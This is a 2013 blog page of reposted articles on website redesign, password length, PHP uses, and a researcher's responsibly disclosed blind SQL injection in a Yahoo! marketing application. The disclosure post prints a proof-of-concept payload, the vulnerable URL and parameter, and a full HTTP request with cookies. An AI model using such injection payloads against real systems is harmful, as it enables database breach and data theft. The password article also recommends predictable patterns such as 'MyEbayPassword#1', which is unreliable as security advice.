When considering your website redesign process, take a look at your competitor's sites, see what changes they have made recently, especially if they are appealing to a larger percentage of your target audience. This can help you and your designer come up with innovative and creative ways for you to dominate your market online.
Ensure you are aware of which of your pages are performing in search results. Do some searches and see which of your pages are already appearing on the front page of the search results. Advice your designer immediately, as it's not wise to make changes to these pages. Remember changes to the pages can affect your ranking in search results, which means it may take time to build your name up again to appearing on the front page.
Through research you will be able to determine which of your pages to include in your website redesign process. Often some subtle changes, updates, navigation and other methods are used to ensure the site performs at its best, appealing to your audiences and helping you increase your online revenue.
Throughout the design process, ensure that your site still appeals to your audience and that performing pages keep their same name and tags, as this is already working for you.
It is imperative once the site has been developed and ready for launch that the final step in your website redesign process is testing. All sites should be thoroughly tested for performance, responsiveness and more.


Monday, May 27, 2013
Posted by Unknown
0 Comments

Online Passwords - Which Is Best, Length or Complexity

Everyone these days needs to have an array of passwords to access all the websites, apps, online resources and devices that surround our daily lives.
We are constantly being urged to make our passwords difficult to guess or crack - use upper and lower case, number, and special characters to make it super safe, but is this really correct?
We all know that it's not good practice to use a dictionary word as a password such as 'monkey' or 'password' so we mix it up by adding numbers and other characters in order to fool the common or garden dictionary attack because 'monkey!2' is much more difficult to crack - isn't it?
The answer to the above question is actually 'No' - sure, 'monkey!2' is going to be harder to guess than 'monkey' on its own, but the key to generating a really secure password is its length, NOT its complexity.
How does this work?
If we assume that your password is not in the dictionary, then the only way to crack it is by a 'brute force' attack whereby an attacker will have to guess every possible combination of letters, numbers, and special characters until they get to your password.
So, in the standard ASCII character set there are 26 letters of the alphabet, each of which could be upper or lower case, plus ten single digits, and thirty three special characters.
Now, we need to do some mathematics to determine how many combinations need to be calculated to cover a password of any length - lets first assume that you have a one character password, the maximum number of guesses needed to crack this password is 95 (Each of the letters of the alphabet both upper and lower case, each digit, and each special character - 26+26+10+33)
So, if we extend that password to a two character password then the possible number of combinations is now 9025 (95 x 95). For a three character password, the number of combinations are 857375 (95 x 95 x 95). If we now make that a ten character password the total possible number of combinations is a whopping 60,510,648,114,517,017,120.
If we have a machine guessing an impressive one hundred billion guesses PER SECOND it will take a maximum of 19.24 years to guess this password which is probably secure enough for most people.
However, if we add just one more character it now becomes 18.28 CENTURIES - easily enough for anyone.
Given the above information then, which of the following two passwords is the most secure?
  • rf65AD$%bAQ or
  • 'Mypassword1.'
It should come as no surprise that the second will take longer to guess (1740 centuries compared to 18.28 centuries for the first) purely because it has one more character.
It's now just a short step to put this into practice and make some really long and difficult to crack passwords that we can remember quite easily. All you need to do is to come up with a personal password algorithm and be creative in making some easily remembered (for you) but difficult to crack passwords. How about something like 'MyEbayPassword#1' or 'EmailPassword#1983' - both of these will take thousands of centuries to guess.


Article Source: http://EzineArticles.com/8534624
Saturday, May 25, 2013
Posted by Unknown
0 Comments

Practical Implementations Of PHP Development

PHP provides us with endless opportunities for development, customization and making the best out of the available technologies. Your creativity is the limit! Today there are millions and millions of websites that are running on PHP. There are also many ways in which you can implement PHP to create technology wonders either to ease business processes or add value to the way businesses work. Here are some practical implementations where PHP has been tried, tested and is popularly used.
PHP for E-commerce
Businesses whether large or small are always on the lookout for new channels for reaching out to customers and what better channel could be than an online presence! One of the greatest uses of PHP is creating e-commerce websites. This can either be done by PHP development or by using PHP frameworks and content management systems. With the help of frameworks or CMS, e-commerce development becomes very easy. Understand the benefits and analyze your business requirements and select the best approach for your business.
Project management software with PHP Development
Another popular use of PHP is for developing project management software. Project management software is important aspects of businesses today. There are many excellent web-based software readily available today. However with PHP, you can build your own project management software from scratch with the exact features you wish.
Facebook apps with PHP
PHP can also be used to integrate Facebook to your website. To develop apps, Facebook provides a PHP client library which can be easily installed and used by developers. It contains detailed instructions for use too. This is an excellent social implementation of PHP.
PHP based Content Management systems
One of the most popular and practical implementation of PHP is in content management systems (CMS). A content management system allows users to update website content without any programming knowledge. User need not have HTML or CSS knowledge to make any changes to the content on the website. The most popular CMS that are PHP based are: WordPress, Drupal etc.
PHP Photo galleries
PHP has excellent file handling functions. You can easily place photos in one directory and create excellent thumbnails on the user interface using PHP.
Creating dynamic website templates
PHP enables you to add pages to a website dynamically. You can create templates and users can very easily use them for adding new pages to their website. That's the charm of using PHP as a preferred development language.
Plug-in development
PHP can also be used to develop plug-ins for popular content management systems. These plug-ins or extensions enable you to add new features to your website that add some business value or ease some administrative tasks.
Over all, PHP proves to be a great choice for all web development efforts. Whether you are creating a plain blogging site, a photo gallery, a complex e-commerce site or a content management system - PHP helps you get what you want!
Lori K Reese works with a well known PHP Development Company that offers a gamut of IT services including services to hire PHP programmers. She has years of experience in PHP web application development and has the expertise to provide innovative web solutions on the go. Keeping up with the latest PHP trends and bringing something new to the web world is what she sees as her passion.


Article Source: http://EzineArticles.com/8523950
Wednesday, May 22, 2013
Posted by Unknown
0 Comments

Yahoo! Blind SQL Injection could lead to data leakage

It seems that 2013 is the "Data Leakage Year"! Many customers' information and confidential data have been published on the internet coming from government institutions, famous vendors, and companies too.

Ebrahim Hegazy(@Zigoo0) an Egyptian information security advisor who found a high severityvulnerability in "Avira license daemon" days ago, is on the news again, but this time for finding and reporting Blind SQL Injection vulnerability in one of Yahoo! E-marketing applications.
SQL Injection vulnerabilities are ranked as Critical vulnerabilities, because if used by Hackers it will cause a database breach which will lead to confidential information leakage.

A time based blind SQL Injection web vulnerability is detected in the official Yahoo! TW YSM Marketing Application Service.

The vulnerability allows remote attackers to inject own SQL commands to breach the database of that vulnerable application and get access to the user data.

The SQL Injection vulnerability is located in the index.php file of the soeasy module when processing to request manipulated scId parameters. By manipulation of the seed parameter the attackers can inject own SQL commands to compromise the web server application DBMS.

The vulnerability can be exploited by remote attackers without privileged application user account and without requiring user interaction. Successful exploitation of the SQL injection vulnerability results in application and application service DBMS compromise.

Vulnerable Service(s): [+] Yahoo! Inc - TW YSM Marketing
Vulnerable Module(s): [+] soeasy
Vulnerable Module(s): [+] index.php
Vulnerable Parameter(s):[+] scId

But the Ebrahim is a white hat, so he reported the vulnerability to the Yahoo! The security team with recommendations on how to patch the vulnerability.

According to Ebrahim, the time line of the vulnerability was:
  • 2013-02-24: Researcher Notification & Coordination
  • 2013-02-25: Vendor Notification
  • 2013-03-01: Vendor Response/Feedback
  • 2013-04-01: Vendor Fix/Patch by check
Proof of Concept
The time-based sql injection web vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. For demonstration or reproduce ...

Vulnerable Service Domain: tw.ysm.emarketing.yahoo.com
Vulnerable Module: soeasy
Vulnerable File: index.php
Vulnerable Parameters: ?p=2&scId=

POC:
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--

Payload:
1; union select SLEEP(5)--

Request:
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113;%20select%20SLEEP(5)--

GET /soeasy/index.php?p=2&scId=113;%20select%20SLEEP(5)-- HTTP/1.1
Host: tw.ysm.emarketing.yahoo.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: is_c=1; device=pc; showNews=Y; B=9tgpb118xilu04&b=3&s=mu; AO=o=1&s=1&dnt=1; tw_ysm_soeasy=d%3D351d9185185129780476f856.
17880929%26s%3DxLxK2mb96diFbErWUyv_jGQ--; __utma=266114698.145757337399.1361672202.1361672202.1361672202.1; __utmb=2663114698.
1.10.1361672202; __utmc=2636114698; __utmz=266114698.13616732202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
DNT: 1
Connection: keep-alive

HTTP/1.0 200 OK
Date: Sun, 24 Feb 2013 02:16:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi
SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip

Solution: The vulnerability can be patched by a restriction and secure parse of the scId parameter request.

More details about the vulnerability could be found here. As most of the readers know that Yahoo! doesn't have a bug bounty program or Hall of fame too, so as a reward from Yahoo! for the researchers who finds a vulnerability in Yahoo! Applications, they do award researchers by sending them a T-shirts with Yahoo! logo and some other tokens.

The researcher told us that he received a package sent to him by Yahoo! containing 2 T-shirts and a big cup ... 

Lean reward, what do you think? Dear Yahoo the next time you may be the victim of black hat.

Wednesday, May 1, 2013
Posted by Unknown
0 Comments

- Copyright © Technology for World -Metrominimalist- Powered by Blogger - Designed by Johanes Djogan -